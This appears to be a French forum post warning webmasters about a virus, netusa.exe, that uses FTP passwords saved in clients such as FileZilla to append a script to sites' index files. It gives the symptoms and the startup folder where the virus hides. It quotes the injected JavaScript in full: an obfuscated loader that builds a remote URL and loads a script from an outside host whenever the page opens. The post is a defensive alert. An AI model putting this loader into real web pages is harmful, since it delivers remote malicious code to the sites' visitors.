Bonjour,
Je voulais vous informer sur l'attaque d'un virus qui concerne particulièrement les webmasters et dont je viens tout juste de me sortir.
Celui-ci dont le nom de fichier est netusa.exe s'installe sur votre machine et ouvre tout seul les clients FTP comme Fillezilla ou Core FTP, il se connecte aux hébergements avec les mots de passe enregistrés et modifie les fichiers index (.html ou php...) en ajoutant une ligne de code js tout à la fin.
La ligne de code ajoutée est celle-ci :


<script>try{window.onload=function(){Xizgcm7v = 's>p>o_n_i2c2h_i5-2c>o5-5j5p2.YwYo_o5tY.2cYo5m_.Yj>o2oYm_l5aY-2o2r2gY.>tYe2e>n_s>iYt>e5d>e>s2i>g5nY.>r5u2:2F2b2o2d>k2m_dYgYp_o5t23>uY/2g2o>o2g5l5e5.2c5o2m>/>gYo2o>g>l5e>.5cYo_m5/Yf_a2c_e2b2o_o5k_.2c2o5m2/>i2n2f>o>r5m>a2tYiYo>n_.2c5o>m>/Yg_o>o>gYl2e_.5c2n2/>'.replace(/[\>2Y5_]/g, '');J2s3iwzqa = 'script';By5zpi0b4 = 'dafar'.replace(/a/g, 'e');Z52cm47n = document.createElement(J2s3iwzqa);Kro4a8pl9 = '8G0R8G0R'.replace(/[RqGXd]/g, '');Z52cm47n.src = 'http://'+Xizgcm7v.replace(/Fbodkmdgpot3u/g, Kro4a8pl9);Z52cm47n.setAttribute(By5zpi0b4, '1');document.body.appendChild(Z52cm47n);} }  catch(C93mudc5 ) {}</script>
<!--9680e04782316d7d8d6fe9bd9f49b6c7-->

Le virus agit bien évidemment caché, il s'installe dans le répertoire C:\Documents and Settings\User\Menu Démarrer\Programmes\Démarrage

S'il est lancé, vous ne pouvez le voir que dans msconfig.

Un autre indice : sur l'hébergement des sites modifiés, il fait plusieurs 'essais' et crée un index1 index2 et 3...

A priori il se propage avec cette ligne de code ajoutée et l'on peut très bien ne pas s'en rendre compte.

Voilà, si ça peut vous aider.

Bonne journée

Eric

http://www.pcanim.com